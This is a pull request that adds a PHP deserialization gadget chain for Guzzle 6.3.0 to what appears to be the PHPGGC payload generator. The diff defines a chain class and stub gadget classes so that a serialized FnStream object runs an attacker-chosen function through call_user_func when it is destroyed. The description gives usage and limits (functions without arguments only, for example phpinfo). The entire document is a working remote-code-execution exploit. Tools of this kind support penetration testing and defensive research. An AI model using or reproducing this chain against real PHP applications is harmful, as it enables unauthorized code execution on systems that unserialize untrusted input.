### PR TITLE
- Guzzle 6.3.0 RCE via \GuzzleHttp\Psr7\FnStream

### DIFF
--- a/gadgetchains/Guzzle/RCE/1/chain.php
+++ b/gadgetchains/Guzzle/RCE/1/chain.php
@@ -1,0 +1,22 @@
+<?php
+
+namespace GadgetChain\Guzzle;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE
+{
+    public $version = '6.3.0';
+    public $vector = '__destruct';
+    public $author = 'proclnas';
+    public $informations = 
+        '1 - Use -s flag on phpggc to generate payload and avoid NULL bytes in the generated payload' . PHP_EOL .
+        '2 - The called function is executed trough a call_user_func call, so it\'s necessary generate the ' . PHP_EOL .
+        '    payload using just the function symbol, eg: ./phpggc guzzle/rce1 -s \'phpinfo\'.';
+
+
+    public function generate(array $parameters)
+    {
+        $code = $parameters['code'];
+
+        return new \GuzzleHttp\Psr7\FnStream(['close' => $code]);
+    }
+}

--- a/gadgetchains/Guzzle/RCE/1/gadgets.php
+++ b/gadgetchains/Guzzle/RCE/1/gadgets.php
@@ -1,0 +1,35 @@
+<?php
+
+namespace Psr\Http\Message
+{
+	interface StreamInterface{}
+}
+
+namespace GuzzleHttp\Psr7
+{
+	class FnStream implements \Psr\Http\Message\StreamInterface
+	{
+	    private $methods;
+
+	    public function __construct(array $methods)
+	    {
+	        $this->methods = $methods;
+
+	        foreach ($methods as $name => $fn) {
+	            $this->{'_fn_' . $name} = $fn;
+	        }
+	    }
+
+	    public function __destruct()
+	    {
+	        if (isset($this->_fn_close)) {
+	            call_user_func($this->_fn_close);
+	        }
+	    }
+
+	    public function close()
+	    {
+	        return call_user_func($this->_fn_close);
+	    }
+	}
+}


### PR DESCRIPTION
Hi guys!
This is a RCE on the GuzzleHttp\Psr7\FnStream class.
It's possible pass functions trough the _fn_* methods using call_user_func.
A point to consider is the fact that we can't pass args to the called func, just call void return funcs (phpinfo, etc)

Last version tested: 6.3.0